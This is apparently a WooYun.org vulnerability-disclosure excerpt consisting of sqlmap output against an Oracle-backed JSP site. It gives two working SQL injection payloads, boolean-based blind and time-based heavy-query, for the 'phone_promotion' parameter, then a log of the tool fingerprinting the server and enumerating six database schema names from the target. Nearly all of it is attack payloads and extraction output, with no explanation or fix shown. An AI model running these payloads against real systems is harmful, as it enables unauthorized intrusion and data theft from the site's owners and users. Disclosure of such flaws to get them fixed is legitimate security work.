WooYun.org

---
Place: GET
Parameter: phone_promotion
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sale_type=2&oper_flag=phone_info&goods_id=5881&phone_promotion=A%'
AND 3843=3843 AND '%'='&city_id=0&user_type=old
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: sale_type=2&oper_flag=phone_info&goods_id=5881&phone_promotion=A%'
AND 5726=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS
T4,ALL_USERS T5) AND '%'='&city_id=0&user_type=old
---
[21:59:44] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.4, JSP, Apache 2.2.25, JSP 2.0
back-end DBMS: Oracle
[21:59:44] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[21:59:44] [INFO] fetching database (schema) names
[21:59:44] [INFO] fetching number of databases
[21:59:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[21:59:44] [INFO] retrieved: 6
[21:59:48] [INFO] retrieved: JSUC2_ACT
[22:01:14] [INFO] retrieved: JSUCREPORT
[22:02:17] [INFO] retrieved: JSUC_AGENT2
[22:03:16] [INFO] retrieved: SYS
[22:03:50] [INFO] retrieved: SYSTEM
[22:05:03] [INFO] retrieved: WMSYS
available databases [6]:
[*] JSUC2_ACT
[*] JSUC_AGENT2
[*] JSUCREPORT
[*] SYS
[*] SYSTEM
[*] WMSYS